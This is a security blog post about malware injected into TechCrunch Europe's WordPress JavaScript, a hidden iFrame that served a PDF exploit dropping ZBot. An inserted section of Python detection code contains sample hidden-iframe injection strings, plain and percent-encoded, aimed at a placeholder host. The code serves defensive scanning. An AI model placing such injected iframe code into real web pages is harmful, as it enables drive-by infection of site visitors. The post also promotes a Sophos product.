TechCrunch Europe serves up malware attack

Graham Cluley

TechCrunch Europe
Updated: The European website of TechCrunch (eu.techcrunch.com), one of the world’s most popular blogs, appears to have fallen victim to hackers, who have planted a malicious script on the site designed to infect unsuspecting visitors.

TechCrunch Europe posted a message on its Twitter feed earlier today describing warnings about malware being distributed via the site as “annoying”. That is a rather unusual turn of phrase, and one which might suggest to observers that the warnings were erroneous rather than the result of a serious security problem.

TechCrunch tweets out warning

A closer examination of TechCrunch Europe’s site reveals that the offending code – a malicious iFrame – has been inserted into a JavaScript file which the site uses as part of its WordPress installation. The iFrame attempts to serve up a malicious PDF file which exploits a vulnerability to infect the visitor’s computer with malware from the ZBot (also known as Zeus) family.
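As an added, constructed example (not code from the article, from TechCrunch or from Sophos), here is the kind of defender-side check a site operator could run over a WordPress install’s JavaScript files to spot an injected hidden iFrame of the sort described above. The two sample scripts and the bad-domain.invalid host are placeholders I made up, not the real payload.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Constructed samples (hypothetical, not the real TechCrunch payload): a benign
# WordPress theme script with a hidden iframe appended via document.write, and
# the same injection hidden behind unescape() percent-encoding.
SAMPLE_JS = """jQuery(document).ready(function($){ $('.menu').show(); });
document.write('<iframe src="http://bad-domain.invalid/in.php" width="1" height="1" style="visibility:hidden;"></iframe>');
"""
SAMPLE_JS_ENCODED = """document.write(unescape('%3Ciframe%20src%3D%22http%3A//bad-domain.invalid/in.php%22%20width%3D1%20height%3D1%20style%3D%22display%3Anone%22%3E%3C/iframe%3E'));
"""

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# 1x1 or 0x0 frames and invisible styles are the classic drive-by signature.
HIDDEN_RE = re.compile(r"""visibility\s*:\s*hidden|display\s*:\s*none|(?:width|height)\s*=\s*["']?[01]["']?(?!\d)""", re.IGNORECASE)

def find_injected_iframes(js_source, trusted_hosts=()):
    """One dict per iframe whose host is not trusted: src, hidden flag, and
    whether document.write emits it (markup has no business in a .js file)."""
    text = js_source
    for _ in range(3):  # peel a few layers of %XX encoding (unescape() wrappers)
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    findings = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        src_m = SRC_RE.search(tag)
        src = src_m.group(1) if src_m else ""
        host = re.sub(r"^[a-z]+://", "", src, flags=re.IGNORECASE).split("/")[0]
        if host in trusted_hosts:
            continue
        context = text[max(0, m.start() - 80):m.start()]  # look back for the writer
        findings.append({"src": src, "hidden": bool(HIDDEN_RE.search(tag)),
                         "document_write": "document.write" in context})
    return findings

def scan_js_tree(web_root, trusted_hosts=()):
    """Walk a web root (e.g. a WordPress install); map suspicious .js paths to findings."""
    report = {}
    for path in Path(web_root).rglob("*.js"):
        hits = find_injected_iframes(path.read_text(errors="ignore"), trusted_hosts)
        if hits:
            report[str(path)] = hits
    return report
```

A hit on a hidden, document.write-emitted frame pointing at an untrusted host is a strong signal; comparing the flagged file against a clean copy from the WordPress or theme distribution confirms the modification.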


Malicious code on the TechCrunch Europe website

Sophos customers who have already switched on “Live Protection” in Sophos Endpoint Security and Data Protection version 9.5 are already protected, benefiting from our very latest in-the-cloud technology to defend against the latest threats like this, efficiently and proactively. There’s a lesson here: “If you are using Sophos version 9.5, turn on Live Protection!” It’s worth it!

Users of some web browsers may also be protected – for instance, here’s a screenshot of Firefox intercepting one of the infected pages on TechCrunch Europe.

Firefox intercepting dangerous page on TechCrunch Europe

The problem appears to have been present on TechCrunch Europe’s website for some time, and yet there has been no obvious warning to visitors posted on its site nor, seemingly, any attempt to remove the malicious script or block users from visiting the infected pages.

One has to wonder whether malicious hackers are taking advantage of the Labor Day holiday in North America today, which may mean that fewer members of TechCrunch’s support team (who might be able to fix this problem) are available.

SophosLabs have analysed the malware being spread via the infection, which we detect as Troj/Zbot-YP.

Update: Andy Brett, an engineer who works for TechCrunch in California, contacted me at about 10pm UK time to tell me that the malicious JavaScript code has been removed from the site, although it may take some time before browsers which rely on third-party blacklists stop warning about pages on the site.

Ideally TechCrunch will post a message on its site (on the TechCrunch Europe site, at least) informing users about the incident and advising that they check their PCs with an up-to-date anti-virus. I don’t see any message to that effect yet on that site – but I’m hopeful.

Yes, some firms are embarrassed when their websites become infected – and it’s not the kind of event that we would wish upon anyone. But let’s not forget that TechCrunch is the victim of a criminal act, and although in an ideal world their site would not have been compromised in this way they are not – ultimately – the ones to blame for the wrongdoing.

What they can do, as a responsible member of the internet community, is advise anyone who might have visited the site while it was infected to double-check their computer systems. That’s the kind of behaviour that we would expect of any website that suffered a security problem – and is, indeed, the kind of behaviour that technology media websites like TechCrunch would expect from others too.

Hat-tip: Thanks to @theharmonyguy who first made me aware of this issue.


Graham Cluley is an award-winning keynote speaker who has given presentations around the world about cybersecurity, hackers, and online privacy. A veteran of the computer security industry since the early 1990s, he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows, makes regular media appearances, and is the co-host of the popular "Smashing Security" podcast. Follow him on Twitter, Mastodon, Threads, Bluesky, or drop him an email.
